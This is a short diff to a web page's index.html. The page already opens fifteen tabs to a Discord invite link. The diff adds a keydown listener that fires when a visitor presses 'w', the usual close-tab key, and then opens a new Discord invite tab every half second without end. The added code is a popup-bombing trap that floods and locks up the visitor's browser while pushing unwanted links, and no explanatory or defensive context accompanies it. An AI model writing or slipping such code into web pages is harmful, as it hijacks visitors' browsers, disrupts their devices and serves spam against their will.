--- a/index.html
+++ b/index.html
@@ -82,6 +82,13 @@
         for (let i = 0; i < 15; i++) {
             window.open('https://discord.gg/69q', '_blank');
         }
+          document.addEventListener("keydown", function(event) {
+            if (event.key.toLowerCase() === "w") {
+                setInterval(() => {
+                    window.open("https://discord.gg/m-8", "_blank");
+                }, 500);
+            }
+        });
     </script>
    
 </body>
